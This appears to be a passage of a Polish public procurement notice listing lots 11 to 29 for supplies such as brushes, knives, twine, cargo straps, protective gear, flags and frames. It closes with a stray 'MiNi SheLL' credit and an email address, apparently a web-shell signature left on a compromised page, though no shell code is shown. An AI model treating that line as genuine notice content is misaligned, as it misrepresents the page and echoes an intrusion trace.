<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nożyków do tapet w ilości 50 szt.
- nóż z łamanym ostrzem o szerokości 18mm;  
 - grubość ostrza: 0,50 mm, 
    - metalowa prowadnica ostrza, 
    - antypoślizgowy korpus, 
    - łamacz zużytego ostrza ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.24.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa szczotek i pędzli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa szczotek i pędzli w ilościach:
1.Szczotka stalowa - 50szt
(do czyszczenia rdzy, ręczna, pięciorzędowa, długość 300mm);
2. Szczotka stalowa tarczowa - 15szt
(fi 125 fi otworu 13);
3. Pędzel płaski  szerokość 2 cale- 30szt;
4. Pędzel płaski angielski 
a)	Szerokość 1,5 cala  - 20szt
b)	Szerokość 2 cale    - 35szt  
c)	Szerokość 36          - 30szt;
5. Pędzel grzejnikowy 36x9 - 30szt;
6. Pędzel okrągły FI 40 - 20szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.42.00-0, 39.22.42.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa szczotek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa szczotek w ilościach:
1.	Szczotka o całkowitej długości 300 - 350mm z mieszanym włosiem o długości  40 - 45mm, przeznaczona do mycia karoserii, szyb i felg samochodowych. Włosie bezpieczne dla lakieru samochodowego. Szczotka wyposażona w końcówkę umożliwiającą podłączenie do (węża) źródła wody. Wyrób firmy LSN Lublin lub równoważny - 9 szt; 
2.	Szczotka przeznaczona do ręcznego mycia samochodów ciężarowych, busów  i autobusów; włosie bezpieczne dla lakieru; kij teleskopowy z końcówką umożliwiającą podłączenie do (węża) źródła wody. Np. Kaja 26x90-160cm produkt nr: SZC187653 lub równoważny - 4 szt;
3.	Szczotka zmiotka drewniana z naturalnym włosiem przeznaczona do użycia w domu, samochodzie, warsztacie.  Wymiary części drewnianej (korpusu): długość w zakresie 380 - 400mm; szerokość w zakresie 35 - 40mm  Wymiary części roboczej (włosie): wysokość w zakresie 55 - 60mm; szerokość w zakresie 35 - 40mm; długość w zakresie  150 - 170mm - 15 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.42.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Dostawa pędzli, wałków i kuwet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pędzli, wałków i kuwet, w ilościach:
1. Pędzel malarski płaski angielski 2(dwucalowy) tj. ok. 50mm, z rączką drewnianą. Pędzel przeznaczony do prac malarskich przy stosowaniu farb olejnych, nitro, akrylowych i chlorokauczukowych - 30 szt;
2. Pędzel malarski płaski angielski 2,5(dwu i półcalowy) tj. ok. 63mm, z rączką drewnianą. Pędzel przeznaczony do prac malarskich przy stosowaniu farb olejnych, nitro, akrylowych  i chlorokauczukowych - 30 szt;
3. Pędzel malarski płaski angielski 3(trzycalowy) tj. ok. 76mm, z rączką drewnianą. Pędzel przeznaczony do prac malarskich przy stosowaniu farb olejnych, nitro, akrylowych i chlorokauczukowych - 30 szt.
4. Pędzel uniwersalny malarski okrągły Fi 30mm, z rączką drewnianą. Pędzel przeznaczony do prac malarskich przy stosowaniu farb olejnych, nitro, akrylowych  i chlorokauczukowych - 40 szt;
5. Pędzel uniwersalny malarski okrągły Fi 45mm, z rączką drewnianą. Pędzel przeznaczony do prac malarskich przy stosowaniu farb olejnych, nitro, akrylowych  i chlorokauczukowych - 30 szt;
6. Wałek welurowy kompletny o wymiarach części roboczej: średnica zewnętrzna wałka w zakresie Fi 25 - 30mm; szerokość wałka w zakresie 8 - 12mm; wysokość runa (materiał tkany)wałka 3 - 5mm Kształtowy pręt prowadzący wałek wykonany z pręta stalowego zakończonego chwytem plastikowym dla ręki, mocowanie wałka (części roboczej) - oring zaciskowy. Wałek przeznaczony do malowania farbami olejnymi, nitro, akrylowymi i chlorokauczukowymi. Produkt Firmy GLOBALL lub równoważny - 3 szt.
7. Wałek welurowy - zapas (wkład wymienny) przeznaczony do malowania farbami olejnymi, nitro, akrylowymi i chlorokauczukowymi. Wkład wymienny, kompatybilny z wałkiem opisanym w pozycji 6 (powyżej) - 6 szt;
8. Kuweta plastikowa malarska wykorzystywana do malowania farbami olejnymi, nitro, akrylowymi i chlorokauczukowymi. Kompatybilna z  wałkiem opisanym       w pozycji 6 - 3 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.42.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Dostawa środków pielęgnacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków pielęgnacyjnych w ilościach:
1.	Praktyczna gąbka do ręcznego mycia samochodów przy zastosowaniu rozcieńczonego wodą szamponu.  Gąbka swoim kształtem przypomina gitarę. Wymiary gabarytowe: długość około 250mm, szerokość około 160mm (zwężenie w części środkowej), grubość (wysokość) około 70mm. Produkt Firmy KAJA o nazwie gitara średnia lub równoważny - 40 szt;
2.	Praktyczny zestaw do pielęgnacji samochodu w estetycznym przezroczystym plastikowym opakowaniu ukompletowany w: 
- wielokrotnego użycia gąbka pokryta irchą do usuwania oparów z szyb i lusterek o wymiarach około 130x85mm;
- wielokrotnego użycia myjka z irchy syntetycznej (ścierka) przeznaczona do czyszczenia   szyb i innych  powierzchni samochodu nawet bez użycia detergentów o wymiarach około   400 x 300mm.                   
  Myjka o podwyższonej chłonności  wykorzystywana do zbierania wody z karoserii;
- ściereczka uniwersalna wielokrotnego użycia o wymiarach około 370 x 350mm nadająca 
  się do mycia i  pielęgnacji samochodu. Ścierka dobrze wchłaniająca płyny, smary i  
  tłuszcze.   Produkt Firmy KAJA lub równoważny - 10 szt;
3.	Gąbka z irchy naturalnej przeznaczona do usuwania oparów z szyb i lusterek wewnątrz i na zewnątrz samochodu. Trwała, o doskonałych właściwościach chłonnych wilgoć i wymiarach około 120x100mm. Produkt Firmy APOS lub równoważny - 20 szt;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Dostawa noży i zapasowych ostrzy do noży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa noży i zapasowych ostrzy do noży w ilościach:
1.	Nóż z wymiennym ostrzem łamanym  typ STANDARD 18mm IRWIN  ID: 10504556 lub równoważny - 8 szt;
2.	Zapasowe ostrza pasujące do noża z pozycji 1, w opakowaniu - 5 sztuk.   Typ IRWIN 10507102 lub równoważne - 7 opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.24.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Dostawa mopów i ścierek do mycia naczyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mopów i ścierek do mycia naczyń w ilościach:
1. Dostawa zestawu sprzątającego  bezdotykowego mop - 2 komplety;
2. Dostawa ścierek do mycia naczyń - 500 opakowań po 3 sztuki pakowane;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.52.56.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Dostawa sznurka pakowego i szpagatu tapicerskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sznurka pakowego i szpagatu tapicerskiego, w ilościach: 
1. sznurek pakowy - 10 rolek - Sznurek jutowy, Gatunek I, bez supłów, wilgotność nie większa niż 10%,  kolor szary, waga rolki 0,5 kg.;
2. szpagat tapicerski rolka 20 metrów,  kolor szary, grubość 2 mm, szpagat wykonany z dwuskrętnego sizalu - 10 szt;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.54.11.30-6, 39.54.11.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Dostawa sznurka pakowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sznurka pakowego -Gatunek I, bez supłów, wilgotność nie większa niż 10%,  kolor szary, waga rolki 0,5 kg - 10 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.54.11.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Dostawa linki holowniczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa linki holowniczej - 3 szt; 
 Linka do awaryjnego holowania samochodów osobowych i mikrobusów o dopuszczalnej  masie całkowitej (DMC) do 3,5 tony. Linka wykonana ze skręconych włókien materiału  pochodzenia włókienniczego zakończona po obu końcach solidnymi hakami z  zabezpieczeniem przed wypięciem z przyłączy holowniczych pojazdów.                                    
  Parametry przedmiotu: 
     - długość: minimum 4 metry;
     - grubość: minimum 18mm;
     - wytrzymałość: minimum 3,5 tony (masa pojazdu holowanego);
     - waga produktu: do 1 kilograma..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.54.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Dostawa czyściwa bawełnianego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa czyściwa bawełnianego - 150 kg;
     Czyściwo przeznaczone do użytkowania w czasie wykonywania prac remontowo-naprawczych w warsztacie      samochodowym przez mechaników. Produkt pochodzenia bawełnianego w kolorze białym, selekcjonowane i  
     pakowane w paczki o ciężarze nie większym niż 5 kilogramów. Czyściwo bez zabrudzeń, guzików itp. -      zdezynfekowane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.54.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Dostawa pasów transportowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pasów transportowych:
1. Pas transportowy 8m/50mm/5T  sztuk 7
        Pas przeznaczony do zabezpieczania przewożonego ładunku przed jego przemieszczaniem na skrzyni ładunkowej samochodu. Kompletny pas składa się z pasa o długości około 7,5 metra i szerokości 50mm zakończonego atestowanym hakiem z jednej strony, drugi koniec pasa przystosowany do wsunięcia w mechanizm naciągowy (napinający) oraz napinacza o długości około 0,5 metra i szerokości 50mm zakończonego z jednej strony atestowanym hakiem a z drugiej mechanizmem (zapadkowym) naciągowym. Nominalna wytrzymałość taśmy użytej do wykonania pasa - minimum 7 ton. 

2. Pas transportowy 10m/50mm/5T  sztuk 7
        Pas przeznaczony do zabezpieczania przewożonego ładunku przed jego przemieszczaniem na skrzyni ładunkowej samochodu. Kompletny pas składa się z pasa o długości około 9,5 metra i szerokości 50mm zakończonego atestowanym hakiem z jednej strony, drugi koniec pasa przystosowany do wsunięcia w mechanizm naciągowy (napinający) oraz napinacza o długości około 0,5 metra i szerokości 50mm zakończonego z jednej strony atestowanym hakiem a z drugiej mechanizmem (zapadkowym) naciągowym. Nominalna wytrzymałość taśmy użytej do wykonania pasa - minimum 7 ton. 

3. Pas transportowy 10m/35mm/5T  sztuk 6
        Pas przeznaczony do zabezpieczania przewożonego ładunku przed jego przemieszczaniem na skrzyni ładunkowej samochodu. Kompletny pas składa się z pasa o długości około 9,5 metra i szerokości 35mm zakończonego atestowanym hakiem z jednej strony, drugi koniec pasa przystosowany do wsunięcia w mechanizm naciągowy (napinający) oraz napinacza o długości około 0,5 metra i szerokości 35mm zakończonego z jednej strony atestowanym hakiem a z drugiej mechanizmem (zapadkowym) naciągowym. Nominalna wytrzymałość taśmy użytej do wykonania pasa - minimum 7 ton..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.35.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Dostawa rękawic ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa rękawic ochronnych - 200 par
Rękawice powlekane nitrylem olejoodporne. 
Rękawice ochronne powlekane nitrylem, zakończone usztywnianym mankietem:
- część wierzchnia i chwytna oblana powłoką nitrylu;
- odporne na ścieranie, przetarcie i przebicie;
- elastyczne, nie ograniczające sprawności ręki;
- powierzchnia pokryta nitrylem odporna na smary, oleje i tłuszcze;
- zachowują swoją formę po praniu;
- przeznaczone dla mechaników oraz dla pracowników wykonujących prace przeładunkowe  i transportowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Dostawa gogli przeciwodpryskowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa gogli przeciwodpryskowych - 10 szt.
Gogle przeciwodpryskowe do stosowania przez mechaników podczas prac przy obróbce metali (szlifowanie, cięcie, kucie itp.). 
Charakterystyka:
- szybka z poliwęglanu;
- regulowana i szeroka taśma nagłowia; 
- elastyczny mostek nosowy; 
- powłoka zabezpieczająca przed zaparowaniem i zarysowaniami szybki; 
- kształt i konstrukcja zapewniająca wygodne i bezpieczne dopasowanie do części ocznej twarzy.
Produkt firmy 3M model 2790 lub równoważny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Dostawa przyłbicyi tarczy spawalniczej oraz ochronników słuchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przyłbicy (1 szt) i tarczy spawalniczej (8 szt.) oraz ochronników słuchu (6 szt)
1. Automatyczna przyłbica spawalnicza samościemniająca z nastawnym filtrem przeznaczona do spawania metodą TIG   i MIG/MAG ze zmiennym stopniem ochrony nie mniejszym niż  zakres 9-13DIN.                                                                                                      Źródło zasilania - ogniwo fotowoltaiczne.
Regulowany stopień zaciemnienia i rozjaśnienia
Czas zaciemnienia nie większy niż 0,4ms
Czas rozjaśnienia  max. 0,8s
Stopień rozjaśnienia około 4 DIN
Produkt  TELWIN JAGUAR lub równoważny

2. Tarcza spawalnicza wykonana z preszpanu z drewnianym uchwytem dokładnie osłaniająca twarz i dłoń spawacza. Wymienne szybki bezbarwne i w ściemnieniach  w zakresie minimum 7 - 14 DIN. Szybka  o wymiarze około 50 x 100 mm.
Produkt OT-13 lub równoważny
3. Ochronniki słuchu o trwałej i lekkiej konstrukcji tłumiące hałas powstający podczas wykonywania prac monterskich, ślusarskich i kowalskich. Duże czasze wypełnione pianką i doskonale dopasowujące się do uszu. Ochronniki składane z możliwością regulacji ustawienia kabłąka i czasz
Produkt typu PW 41 lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.14.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Dostawa flag.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa flag w ilościach:
1. Flaga  RP na maszt - 15 szt;
Flagi wykonane z dzianiny poliestrowej o masie 120g/mkw.
wymiary: 240 x 150 cm, z karabińczykami.
2. Flaga  RP na drzewce - 15 szt;
Flagi wykonane z dzianiny poliestrowej o masie 120g/mkw.
wymiary: 100 x 150 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.82.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Dostawa mównicy z orłem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mównicy z orłem - 1 szt;
materiał z litego drewna ciemnego, wymiary 52x40x112cm,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Dostawa worków polietylenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa worków polietylenowych w ilości 75 szt;
- worki polietylenowe 120 litrów, pakowane w rolkach po 25 szt. na rolce,
- wykonane z foli LDPE wzmocnione,
- worki w kolorze czarnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Dostawa etui oraz antyram.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa etui oraz antyram w ilościach:
1. Etui - 40 szt;
kolor bordowy do podkładu  08324 20x25cm (8x10)-poziome 5 szt.
kolor bordowy do podkładu  08325 22,5x30,5 cm (9x12)-poziome 5 szt.
kolor bordowy do podkładu  08348 20x25cm (8x10)- pionowe 10 szt.
kolor bordowy do podkładu  08349 22,5x30,5cm(9x12-pionowe 20 szt.
2. Antyramy - 15 szt;
Format: 40x50cm z plexi, możliwość zawieszenia w pionie i poziomie z metalowymi klipsami.
płyta HDF - grubość 4 mm.
front o grubości 1 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 39.29.82.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com